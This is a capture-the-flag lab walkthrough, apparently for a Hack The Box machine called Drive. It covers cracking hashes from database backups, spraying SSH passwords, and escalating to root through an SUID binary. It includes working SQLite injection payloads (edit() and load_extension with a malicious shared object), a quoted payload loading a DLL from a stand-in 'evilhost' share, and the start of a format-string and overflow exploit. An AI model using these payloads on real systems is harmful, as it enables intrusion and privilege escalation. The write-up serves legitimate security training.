tcp 0 0 0.0.0.0:22 0.0.0.0:* LISTEN -
tcp6 0 0 :::80 :::* LISTEN -
tcp6 0 0 :::22 :::* LISTEN -
tcp6 0 0 :::3000 :::* LISTEN -
curl
shows that this is a Gitea instance:
martin@drive:~$ curl -s localhost:3000 | head
<!DOCTYPE html>
<html lang="en-US" class="theme-">
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title> Gitea: Git with a cup of tea</title>
<link rel="manifest" href="data:application/json;base64,eyJuYW1lIjoiR2l0ZWE6IEdpdCB3aXRoIGEgY3VwIG9mIHRlYSIsInNob3J0X25hbWUiOiJHaXRlYTogR2l0IHdpdGggYSBjdXAgb2YgdGVhIiwic3RhcnRfdXJsIjoiaHR0cDovL2xvY2FsaG9zdDozMDAwLyIsImljb25zIjpbeyJzcmMiOiJodHRwOi8vbG9jYWxob3N0OjMwMDAvYXNzZXRzL2ltZy9sb2dvLnBuZyIsInR5cGUiOiJpbWFnZS9wbmciLCJzaXplcyI6IjUxMng1MTIifSx7InNyYyI6Imh0dHA6Ly9sb2NhbGhvc3Q6MzAwMC9hc3NldHMvaW1nL2xvZ28uc3ZnIiwidHlwZSI6ImltYWdlL3N2Zyt4bWwiLCJzaXplcyI6IjUxMng1MTIifV19">
<meta name="theme-color" content="#6cc644">
<meta name="default-theme" content="auto">
<meta name="author" content="Gitea - Git with a cup of tea">
To get better access, I’ll use SSH to create a tunnel from port 3000 on my box to port 3000 on Drive with -L 3000:localhost:3000
. Now in Firefox:
On the “Explore” link, there are a couple of users visible to unauthenticated users:
I am able to register myself an account, but it doesn’t give access to anything additional.
One of the users is martinCruz, and I have a password for a martin user already. I’ll try it here, and it works! martin has access to one repository that was not visible before:
This repo is for the website:
I’ll note a couple things:
db_backup.sh
was added in a commit titles “added the new database backup feature”, which was on 22 December 2022. The script itself has the password for the archives:
#!/bin/bash
DB=$1
date_str=$(date +'%d_%b')
7z a -p'H@ckThisP@ssW0rDIfY0uC@n:)' /var/www/backups/${date_str}_db_backup.sqlite3.7z db.sqlite3
cd /var/www/backups/
ls -l --sort=t *.7z > backups_num.tmp
backups_num=$(cat backups_num.tmp | wc -l)
if [[ $backups_num -gt 10 ]]; then
#backups is more than 10... deleting to oldest backup
rm $(ls *.7z --sort=t --color=never | tail -1)
#oldest backup deleted successfully!
fi
rm backups_num.tmp
The geeks_site
folder has a last comment message referencing going back to “default Django hashes due to problems in BCrypt”, dated 26 December 2022. That specifically applies to a settings.py
file. The history of the file shows it set to SHA1 to Bcrypt and back to SHA1:
With the password, I’ll revisit the backup archives. I can extract each to /dev/shm
with the following command:
martin@drive:/var/www/backups$ 7z e -o/dev/shm 1_Oct_db_backup.sqlite3.7z -p'H@ckThisP@ssW0rDIfY0uC@n:)'
...[snip]...
martin@drive:/var/www/backups$ mv /dev/shm/db.sqlite3 /dev/shm/oct.sqlite3
After doing all four, I have:
martin@drive:/dev/shm$ ls
dec.sqlite3 nov.sqlite3 oct.sqlite3 sep.sqlite3
Each of the backups are basically the same as each other and the db.sqlite3
that I could access above. I’ll show the general structure here, and call out the differences later.
The database looks like a Django DB based on the table names:
sqlite> .tables
accounts_customuser auth_permission
accounts_customuser_groups django_admin_log
accounts_customuser_user_permissions django_content_type
accounts_g django_migrations
accounts_g_users django_session
auth_group myApp_file
auth_group_permissions myApp_file_groups
A bunch of the tables are empty. myApp_file
has the content from the files I was able to read with the IDOR:
sqlite> select * from myApp_file;
98|documents/crisDisel/Hi|b'hi team\nhave a great day.\nwe are testing the new edit functionality!\nit seems to work great!\n'|2022-12-24 16:52:22.971837|24||Hi!
99|documents/jamesMason/security_announce|b'hi team\nplease we have to stop using the document platform for the chat\n+I have fixed the security issues in the middleware\nthanks! :)\n'|2022-12-24 16:55:56.501240|21||security_announce
101|documents/jamesMason/database_backup_plan|hi team!
me and my friend(Cris) created a new backup scheduled plan for the database
the database will be automatically highly compressed and copied to /var/www/backups/ by a small bash script every day at 12:00 AM
*Note: the backup directory may change in the future!
*Note2: the backup would be protected with strong password! don't even think to crack it guys! :)|2022-12-24 22:49:49.515472|21|21|database_backup_plan!
Most interesting is the accounts_customuser
table, which has hashes for users that match up nicely with some local accounts on Drive:
sqlite> select * from accounts_customuser;
21|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a|2022-12-26 05:48:27.497873|0|jamesMason|||jamesMason@drive.htb|0|1|2022-12-23 12:33:04
22|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f|2022-12-24 12:55:10|0|martinCruz|||martin@drive.htb|0|1|2022-12-23 12:35:02
23|sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e9e3004|2022-12-24 13:17:45|0|tomHands|||tom@drive.htb|0|1|2022-12-23 12:37:45
24|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f|2022-12-24 16:51:53|0|crisDisel|||cris@drive.htb|0|1|2022-12-23 12:39:15
30|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3|2022-12-26 05:43:40.388717|1|admin|||admin@drive.htb|1|1|2022-12-26 05:30:58.003372
There are tables with group names and how they tie to files, but nothing too interesting.
One place that I see differences is the myApp_file
table, as the older backups don’t have as many messages. Still, there’s nothing I haven’t seen before.
Another place to look for differences is in the accounts_customuser
table. I’ll loop over each and dump the hashes:
martin@drive:/dev/shm$ ls | while read db; do echo "$db"; sqlite3 "$db" 'select username,password from accounts_customuser;'; done
db.sqlite3
jamesMason|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands|sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e9e3004
crisDisel|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
admin|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3
dec.sqlite3
admin|pbkdf2_sha256$390000$ZjZj164ssfwWg7UcR8q4kZ$KKbWkEQCpLzYd82QUBq65aA9j3+IkHI6KK9Ue8nZeFU=
jamesMason|pbkdf2_sha256$390000$npEvp7CFtZzEEVp9lqDJOO$So15//tmwvM9lEtQshaDv+mFMESNQKIKJ8vj/dP4WIo=
martinCruz|pbkdf2_sha256$390000$GRpDkOskh4irD53lwQmfAY$klDWUZ9G6k4KK4VJUdXqlHrSaWlRLOqxEvipIpI5NDM=
tomHands|pbkdf2_sha256$390000$wWT8yUbQnRlMVJwMAVHJjW$B98WdQOfutEZ8lHUcGeo3nR326QCQjwZ9lKhfk9gtro=
crisDisel|pbkdf2_sha256$390000$TBrOKpDIumk7FP0m0FosWa$t2wHR09YbXbB0pKzIVIn9Y3jlI3pzH0/jjXK0RDcP6U=
nov.sqlite3
jamesMason|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands|sha1$Ri2bP6RVoZD5XYGzeYWr7c$4053cb928103b6a9798b2521c4100db88969525a
crisDisel|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
admin|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3
oct.sqlite3
jamesMason|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands|sha1$Ri2bP6RVoZD5XYGzeYWr7c$71eb1093e10d8f7f4d1eb64fa604e6050f8ad141
crisDisel|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
admin|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3
sep.sqlite3
jamesMason|sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz|sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands|sha1$DhWa3Bym5bj9Ig73wYZRls$3ecc0c96b090dea7dfa0684b9a1521349170fc93
crisDisel|sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
admin|sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3
The BCrypt hashes (start with pbkdf2
) are going to be very difficult to crack. I’ll start with the others. There are eight unique hashes, four of which belong to tom:
martin@drive:/dev/shm$ ls | while read db; do echo "$db"; sqlite3 "$db" 'select username,password from accounts_customuser;'; done | grep sha1 | sort -u | tr '|' ':'
admin:sha1$jzpj8fqBgy66yby2vX5XPa$52f17d6118fce501e3b60de360d4c311337836a3
crisDisel:sha1$ALgmoJHkrqcEDinLzpILpD$4b835a084a7c65f5fe966d522c0efcdd1d6f879f
jamesMason:sha1$W5IGzMqPgAUGMKXwKRmi08$030814d90a6a50ac29bb48e0954a89132302483a
martinCruz:sha1$E9cadw34Gx4E59Qt18NLXR$60919b923803c52057c0cdd1d58f0409e7212e9f
tomHands:sha1$DhWa3Bym5bj9Ig73wYZRls$3ecc0c96b090dea7dfa0684b9a1521349170fc93
tomHands:sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e9e3004
tomHands:sha1$Ri2bP6RVoZD5XYGzeYWr7c$4053cb928103b6a9798b2521c4100db88969525a
tomHands:sha1$Ri2bP6RVoZD5XYGzeYWr7c$71eb1093e10d8f7f4d1eb64fa604e6050f8ad141
I’ll take the usernames and hashes from the backup DB and send them through hashcat
:
$ hashcat hashes --user /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt
hashcat (v6.2.6) starting in autodetect mode
...[snip]...
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
124 | Django (SHA-1) | Framework
...[snip]...
sha1$kyvDtANaFByRUMNSXhjvMc$9e77fb56c31e7ff032f8deb1f0b5e8f42e9e3004:john316
sha1$DhWa3Bym5bj9Ig73wYZRls$3ecc0c96b090dea7dfa0684b9a1521349170fc93:john boy
sha1$Ri2bP6RVoZD5XYGzeYWr7c$71eb1093e10d8f7f4d1eb64fa604e6050f8ad141:johniscool
sha1$Ri2bP6RVoZD5XYGzeYWr7c$4053cb928103b6a9798b2521c4100db88969525a:johnmayer7
...[snip]...
All four passwords for tomHands crack.
To quickly check is any of these work over SSH, I’ll create a text file with one per line, and feed it to netexec
:
oxdf@hacky$ netexec ssh drive.htb -u tom -p tom_passwords
SSH 10.10.11.235 22 drive.htb [*] SSH-2.0-OpenSSH_8.2p1 Ubuntu-4ubuntu0.9
SSH 10.10.11.235 22 drive.htb [-] tom:john316 Authentication failed.
SSH 10.10.11.235 22 drive.htb [-] tom:john boy Authentication failed.
SSH 10.10.11.235 22 drive.htb [-] tom:johniscool Authentication failed.
SSH 10.10.11.235 22 drive.htb [+] tom:johnmayer7 - shell access!
It works!
I’ll connect over SSH:
oxdf@hacky$ sshpass -p 'johnmayer7' ssh tom@drive.htb
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-164-generic x86_64)
...[snip]...
tom@drive:~$
su
also works from the shell as martin:
martin@drive:/dev/shm$ su - tom
Password:
tom@drive:~$
Either way, I can grab user.txt
:
tom@drive:~$ cat user.txt
20b6a381************************
In the tom user’s home directory, there’s a doodleGrive-cli
file that’s owned by root and set as SetUID:
tom@drive:~$ ls -l
total 876
-rwSr-x--- 1 root tom 887240 Sep 13 13:36 doodleGrive-cli
-rw-r----- 1 root tom 719 Feb 11 2023 README.txt
-rw-r----- 1 root tom 33 Feb 12 21:26 user.txt
The README.txt
says:
Hi team
after the great success of DoodleGrive, we are planning now to start working on our new project: "DoodleGrive self hosted",it will allow our customers to deploy their own documents sharing platform privately on their servers...
However in addition with the "new self Hosted release" there should be a tool(doodleGrive-cli) to help the IT team in monitoring server status and fix errors that may happen.
As we mentioned in the last meeting the tool still in the development phase and we should test it properly...
We sent the username and the password in the email for every user to help us in testing the tool and make it better.
If you face any problem, please report it to the development team.
Best regards.
Running it prompts for a username and password:
tom@drive:~$ ./doodleGrive-cli
[!]Caution this tool still in the development phase...please report any issue to the development team[!]
Enter Username:
0xdf
Enter password for 0xdf:
0xdf
Invalid username or password.
I’ll pull the binary to my host with scp
:
oxdf@hacky$ sshpass -p 'johnmayer7' scp tom@drive.htb:~/doodleGrive-cli .
The file is a 64-bit Linux executable:
oxdf@hacky$ file doodleGrive-cli
doodleGrive-cli: ELF 64-bit LSB executable, x86-64, version 1 (GNU/Linux), statically linked, BuildID[sha1]=8c72c265a73f390aa00e69fc06d96f5576d29284, for GNU/Linux 3.2.0, not stripped
Running strings
on the binary shows a few clues. The program uses SQLite and the database in the web directory:
oxdf@hacky$ strings doodleGrive-cli
...[snip]...
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'SELECT id,last_login,is_superuser,username,email,is_staff,is_active,date_joined FROM accounts_customuser;'
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'SELECT id,name FROM accounts_g;'
/usr/bin/sudo -u www-data /opt/server-health-check.sh
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'UPDATE accounts_customuser SET is_active=1 WHERE username="%s";'
...[snip]...
There’s a menu:
...[snip]...
doodleGrive cli beta-2.2:
1. Show users list and info
2. Show groups list
3. Check server health and status
4. Show server requests log (last 1000 request)
5. activate user account
6. Exit
Select option:
exiting...
please Select a valid option...
...[snip]...
There are strings about logging in:
...[snip]...
[!]Caution this tool still in the development phase...please report any issue to the development team[!]
Enter Username:
Enter password for
moriarty
findMeIfY0uC@nMr.Holmz!
Welcome...!
Invalid username or password.
...[snip]...
With just this, I can guess the username of moriarty and password “findMeIfY0uC@nMr.Holmz!” (which does work).
I’ll open it in Ghidra and once it finishes analysis, go to main
. After a bit of renaming / retyping, it looks like:
int main(void)
{
int res;
long in_FS_OFFSET;
char entered_username [16];
char entered_password [56];
long canary;
canary = *(long *)(in_FS_OFFSET + 0x28);
setenv("PATH","",1);
setuid(0);
setgid(0);
puts(
"[!]Caution this tool still in the development phase...please report any issue to the developm ent team[!]"
);
puts("Enter Username:");
fgets(entered_username,0x10,(FILE *)stdin);
sanitize_string(entered_username);
printf("Enter password for ");
printf(entered_username,0x10);
puts(":");
fgets(entered_password,400,(FILE *)stdin);
sanitize_string(entered_password);
res = strcmp(entered_username,"moriarty");
if (res == 0) {
res = strcmp(entered_password,"findMeIfY0uC@nMr.Holmz!");
if (res == 0) {
puts("Welcome...!");
main_menu();
goto LAB_0040231e;
}
}
puts("Invalid username or password.");
LAB_0040231e:
if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return 0;
}
The username and password are static checks for “moriarty” and “findMeIfY0uC@nMr.Holmz!”, just as I predicted when looking at strings.
This function looks a bit complex, but it is just looping through the string and removing any characters that match a given deny list:
void sanitize_string(char *string)
{
size_t sVar1;
long in_FS_OFFSET;
int ptr;
int i;
uint j;
undefined8 local_29;
undefined local_21;
long canary;
bool bad_char;
canary = *(long *)(in_FS_OFFSET + 0x28);
ptr = 0;
local_29 = 0x5c7b2f7c20270a00;
local_21 = 0x3b;
i = 0;
do {
sVar1 = strlen(string);
if (sVar1 <= (ulong)(long)i) {
string[ptr] = '\0';
if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
bad_char = false;
for (j = 0; j < 9; j = j + 1) {
if (string[i] == *(char *)((long)&local_29 + (long)(int)j)) {
bad_char = true;
break;
}
}
if (!bad_char) {
string[ptr] = string[i];
ptr = ptr + 1;
}
i = i + 1;
} while( true );
}
The bad characters are in hex “5c7b2f7c20270a003b”, which is “\{/| ‘\n\00;”. This is a bit of an odd list, but it will prevent some attacks such as SQL injection.
This function offers the menu, parses the input, and calls the matching function:
void main_menu(void)
{
long in_FS_OFFSET;
char user_input [24];
undefined8 canary;
canary = *(undefined8 *)(in_FS_OFFSET + 0x28);
fflush((FILE *)stdin);
do {
putchar(10);
puts("doodleGrive cli beta-2.2: ");
puts("1. Show users list and info");
puts("2. Show groups list");
puts("3. Check server health and status");
puts("4. Show server requests log (last 1000 request)");
puts("5. activate user account");
puts("6. Exit");
printf("Select option: ");
fgets(user_input,10,(FILE *)stdin);
switch(user_input[0]) {
case '1':
show_users_list();
break;
case '2':
show_groups_list();
break;
case '3':
show_server_status();
break;
case '4':
show_server_log();
break;
case '5':
activate_user_account();
break;
case '6':
puts("exiting...");
/* WARNING: Subroutine does not return */
exit(0);
default:
puts("please Select a valid option...");
}
} while( true );
}
It only checks the first byte of input for ASCII 1-6, and option 6 just exits.
Each of the menu options calls a function with system
and the output will be shown to the screen. For example, show_users_list
:
void show_users_list(void)
{
long in_FS_OFFSET;
long canary;
canary = *(long *)(in_FS_OFFSET + 0x28);
system(
"/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line \'SELECT id,last_login,is_superuser, username,email,is_staff,is_active,date_joined FROM accounts_customuser;\'"
);
if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
In this case, it runs a SQLite query. The others each call system with a different command:
Option | Function | Command |
---|---|---|
1 | show_users_list |
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'SELECT id,last_login,is_superuser, username,email,is_staff,is_active,date_joined FROM accounts_customuser;' |
2 | show_groups_list |
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line 'SELECT id,name FROM accounts_g;' |
3 | show_server_status |
/usr/bin/sudo -u www-data /opt/server-health-check.sh |
4 | show_server_log |
/usr/bin/sudo -u www-data /usr/bin/tail -1000 /var/log/nginx/access.log |
Each of these runs without user input, so there’s not much I can do to mess with them.
Option 5, activate_user_account
, is similar to the others, but it takes user input:
void activate_user_account(void)
{
size_t first_newline_offset;
long in_FS_OFFSET;
char username_input [48];
char cmd_str [264];
long canary;
canary = *(long *)(in_FS_OFFSET + 0x28);
printf("Enter username to activate account: ");
fgets(username_input,0x28,(FILE *)stdin);
first_newline_offset = strcspn(username_input,"\n");
username_input[first_newline_offset] = '\0';
if (username_input[0] == '\0') {
puts("Error: Username cannot be empty.");
}
else {
sanitize_string(username_input);
snprintf(cmd_str,0xfa,
"/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line \'UPDATE accounts_customuser SET is_active=1 WHERE username=\"%s\";\'"
,username_input);
printf("Activating account for user \'%s\'...\n",username_input);
system(cmd_str);
}
if (canary != *(long *)(in_FS_OFFSET + 0x28)) {
/* WARNING: Subroutine does not return */
__stack_chk_fail();
}
return;
}
It updates the is_active
value for a user to 1.
There are multiple vulnerabilities in this binary that can lead to a root shell:
flowchart TD;
A[SetUID doodleGrive-cli]-->B(SQL Injection);
B-->C(edit RCE);
C-->D[root Shell];
B-->G(load_extension RCE);
G-->D;
A-->E(Format String\nLeak Canary);
E-->F(BOF / ROP);
F-->D;
subgraph identifier[" "]
direction LR
start1[ ] --->|intended| stop1[ ]
style start1 height:0px;
style stop1 height:0px;
start2[ ] --->|unintended| stop2[ ]
style start2 height:0px;
style stop2 height:0px;
end
linkStyle default stroke-width:2px,stroke:#FFFF99,fill:none;
linkStyle 0,1,2,3,4,9 stroke-width:2px,stroke:#4B9CD3,fill:none;
style identifier fill:#1d1d1d,color:#FFFFFFFF;
This is method involves abusing the edit
SQL function. This function allows an interactive user to specify a binary that will apply to each value from a column as they are used.
If the second argument is omitted, the VISUAL environment variable is used.
So if I can set this environment variable, it will call a program for me.
Locally I can try this on the db.sqlite3
file on my local system:
oxdf@hacky$ VISUAL=cat sqlite3 db.sqlite3 'select "1" from accounts_customuser where username=""&edit(username)';
admincrisDiseljamesMasonmartinCruztomHands
By setting VISUAL
to cat
, it calls cat
on each column one by one as part of the query.
I don’t need to bypass the filter at all, as none of these characters are removed.
I’ll start the CLI and authenticate:
tom@drive:~$ VISUAL=/usr/bin/vim ./doodleGrive-cli
[!]Caution this tool still in the development phase...please report any issue to the development team[!]
Enter Username:
moriarty
Enter password for moriarty:
findMeIfY0uC@nMr.Holmz!
Welcome...!
doodleGrive cli beta-2.2:
1. Show users list and info
2. Show groups list
3. Check server health and status
4. Show server requests log (last 1000 request)
5. activate user account
6. Exit
Select option:
I’ll select option 5, and give it my injection:
Select option: 5
Enter username to activate account: "&edit(username);-- -
When I hit enter, it open vim
with the text “admin”. I’ll enter :!/bin/bash
to execute bash
from within vim
, and it drops to a root shell:
Select option: 5
Enter username to activate account: "&edit(username);-- -
Activating account for user '"&edit(username)---'...
bash: groups: No such file or directory
bash: lesspipe: No such file or directory
bash: dircolors: No such file or directory
root@drive:~#
This shell has no PATH, so I can either set it, or run everything with full path:
root@drive:/root# /bin/ls
root.txt
root@drive:/root# /bin/cat root.txt
641e7a5b************************
The activate_user_account
function asks for input which is used to build a command string. If I can bypass the filter function, then I can inject into that SQLite call. The PayloadsAllTheThings page on SQLite shows this POC for getting RCE via SQLite:
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
It’s loading a DLL from a file share to run on a Windows host. Still, this is enough to get me looking at the load_extension
function, which seems to load a shared object file and call sqlite3_extension_init
.
First I want to get a payload that will run. I’ll create a very simple POC program in C:
#include <stdlib.h>
void sqlite3_extension_init() {
system("id");
}
I’ll compile that into a shared object:
oxdf@hacky$ gcc -shared -fPIC poc.c -o poc.so
oxdf@hacky$ file poc.so
poc.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=1d5a4c0bc52b6a08141a4c04150203fbfc155bdf, not stripped
Now I’ll run sqlite3
and try to get it loaded. To run commands from the command line, I’ll need to give it a DB to open, but it doesn’t have to actually exist if I’m not querying any tables:
oxdf@hacky$ sqlite3 does_not_exist.sql "select 1";
1
The same way, I can call load_extension
:
oxdf@hacky$ sqlite3 does_not_exist.sql "select load_extension('./poc')";
uid=1000(oxdf) gid=1000(oxdf) groups=1000(oxdf),115(netdev),123(nopasswdlogin),141(docker),999(vboxsf)
The fact that I see id
output shows it ran my extension.
The program runs the following:
/usr/bin/sqlite3 /var/www/DoodleGrive/db.sqlite3 -line \'UPDATE accounts_customuser SET is_active=1 WHERE username=\"%s\";\'
It is putting my input in double quote marks. So to inject out of that, I need send something like:
",load_extension('./poc');-- -
That would make the SQL:
UPDATE accounts_customuser SET is_active=1 WHERE username="",load_extension('./poc');-- -"
On my machine, I’ll try that:
oxdf@hacky$ sqlite3 does_not_exist.sql 'select "1",load_extension("./poc");-- -aaaaasdasda';
uid=1000(oxdf) gid=1000(oxdf) groups=1000(oxdf),115(netdev),123(nopasswdlogin),141(docker),999(vboxsf)
1|
This is actually cool because it’s showing how the extension is loaded, and it returns nothing, which becomes the empty column in the output. The junk after the -- -
is just to make sure the comment works.
For this to work, I need to use the /
character, which is banned. I don’t have a good way to reference my shared library without it. However, load_extension
takes a string. In the above example I hardcode it, but there’s no reason that string can’t be the output of a function. For example, char
(docs). “./poc” as a list of ints is 46, 47, 112, 111, 99. So I can do:
oxdf@hacky$ sqlite3 does_not_exist.sql 'select "1",load_extension(char(46,47,112,111,99));-- -aaaaasdasda';
uid=1000(oxdf) gid=1000(oxdf) groups=1000(oxdf),115(netdev),123(nopasswdlogin),141(docker),999(vboxsf)
1|
Putting that all together, I’ll generate a SO to run on Drive:
#include <stdlib.h>
void sqlite3_extension_init() {
system("/bin/id");
}
It’s important to give the full path, as the binary drops the PATH
variable. I’ll compile it:
tom@drive:/dev/shm$ gcc -shared poc.c -o p.so -fPIC
tom@drive:/dev/shm$ file p.so
poc.so: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, BuildID[sha1]=703f07b9524db0445fbabc08c598856232039ce2, not stripped
I have to make this short. The input user name is limited to 0x28 = 40 characters:
printf("Enter username to activate account: ");
fgets(username_input,0x28,(FILE *)stdin);
To do "+load_extension(char(46,47,112,111,99));-- -
is 45 characters. If I name my extension p.so
, I’ll work fine as "+load_extension(char(46,47,112));-- -
at 38 characters.
Now from /dev/shm
(so that ./p.so
works), I’ll run doodleGrive-cli
. After authenticating, I’ll select 5 and give the injection:
Select option: 5
Enter username to activate account: "+load_extension(char(46,47,112));-- -
Activating account for user '"+load_extension(char(46,47,112))---'...
uid=0(root) gid=0(root) groups=0(root),1003(tom)
doodleGrive cli beta-2.2:
1. Show users list and info
2. Show groups list
3. Check server health and status
4. Show server requests log (last 1000 request)
5. activate user account
6. Exit
Select option:
It ran id
!
I’ll update my poc.c
to make a copy of bash
and set it as SetUID/SedGID (I like this better than just changing /bin/bash
as to not accidentally spoil for other players).
#include <stdlib.h>
void sqlite3_extension_init() {
system("/bin/cp /bin/bash /tmp/0xdf");
system("/bin/chmod 6777 /tmp/0xdf");
}
I’ll compile that over p.so
and run the exploit again. Now there’s a SetUID/SetGID binary at /tmp/0xdf
:
tom@drive:/dev/shm$ ls -l /tmp/0xdf
-rwsrwsrwx 1 root root 1183448 Feb 14 22:25 /tmp/0xdf
Running with -p
(to not drop privs) gives a root shell and the flag:
tom@drive:/dev/shm$ /tmp/0xdf -p
0xdf-5.0# id
uid=1003(tom) gid=1003(tom) euid=0(root) egid=0(root) groups=0(root),1003(tom)
0xdf-5.0# cat /root/root.txt
641e7a5b************************
There’s nothing here I haven’t shown many times before, but I’ll give a quick walkthrough as it is the intended way.
In main
, there’s a format string vuln, where the user input name is printed as the first argument to printf
:
printf("Enter password for ");
printf(entered_username,0x10);
That printf
call takes place at the 0x40229c. The stack canary is set at 0x402202. I’ll break at both of those in gdb
:
gdb-peda$ b *0x402202
Breakpoint 1 at 0x402202
gdb-peda$ b *0x40229c
Breakpoint 2 at 0x40229c
I’ll run to the first break, and then step to see the canary get set in RAX and then pushed to the stack. In this run, its set as:
RAX: 0xa70f7a4603600e00
I’ll run to the next break, putting in whatever as a username. When it gets there, I’ll look at the stack:
gdb-peda$ x/16g $rsp
0x7fffffffda80: 0x0000786c24353125 0x0000000000000002
0x7fffffffda90: 0x00000000004c00e0 0x000000000040339c
0x7fffffffdaa0: 0x00007fffffffdc08 0x0000000000400518
0x7fffffffdab0: 0x0000000000403320 0x00000000004033c0
0x7fffffffdac0: 0x0000000000000000 0xa70f7a4603600e00
0x7fffffffdad0: 0x0000000000403320 0x0000000000402b50
0x7fffffffdae0: 0x0000000000000000 0x0000000100000000
0x7fffffffdaf0: 0x00007fffffffdc08 0x00000000004021ed
The space for input is small, but I can read the i-th word on the stack with %i$lx
, where i
is a number.
I’ll use a simple Bash loop to try different offsets:
oxdf@hacky$ for i in $(seq 1 30); do echo -n "$i: "; echo "%${i}"'$lx' | ./doodleGrive-cli | grep "Enter password for" | cut -d' ' -f4; done
1: 10:
2: 0:
3: 0:
4: 7ffc322aa7b0:
5: 13:
6: 786c243625:
7: 2:
8: 4c00e0:
9: 40339c:
10: 7ffe4d8f3f48:
11: 400518:
12: 403320:
13: 4033c0:
14: 0:
15: 7e298c924cb0a00:
16: 403320:
17: 402b50:
18: 0:
19: 100000000:
20: 7fff573f1318:
21: 4021ed:
22: 0:
23: 1900000000:
24: 21:
25: 2000000000:
26: 0:
27: 0:
28: 0:
29: 0:
30: 0:
15 looks like the best candidate to be the carary. If I run the loop a couple more times, most of the values stay basically the same, but 15 is completely random. That’s the canary.
The output looks like this:
oxdf@hacky$ ./doodleGrive-cli
[!]Caution this tool still in the development phase...please report any issue to the development team[!]
Enter Username:
%15$lx
Enter password for ae1d5d1e957b4200:
Next I’ll get the offset of the overflow to overwrite RIP. The entered_password
buffer is 56 bytes long, but it’s read into unsafely up to 400 bytes:
fgets(entered_password,400,(FILE *)stdin);
I’ll create a pattern:
oxdf@hacky$ pattern_create -l 200
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag
I’ll set a break point at the place where the canary is checked:
gdb-peda$ disassemble main
...[snip]...
0x0000000000402323 <+310>: mov rcx,QWORD PTR [rbp-0x8]
0x0000000000402327 <+314>: xor rcx,QWORD PTR fs:0x28
0x0000000000402330 <+323>: je 0x402337 <main+330>
0x0000000000402332 <+325>: call 0x456d30 <__stack_chk_fail_local>
0x0000000000402337 <+330>: leave
0x0000000000402338 <+331>: ret
gdb-peda$ b *main+314
Breakpoint 1 at 0x402327
I’ll run, entering whatever for the username and the pattern for the password. When it hits the break point, I can see it’s just loaded the canary off the stack into RCX:
[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x400518 --> 0x0
RCX: 0x4130634139624138 ('8Ab9Ac0A')
RDX: 0x0
RSI: 0x4c8bd0 ("Invalid username or password.\nthe development phase...please report any issue to the development team[!]\n")
RDI: 0x4c5ea0 --> 0x0
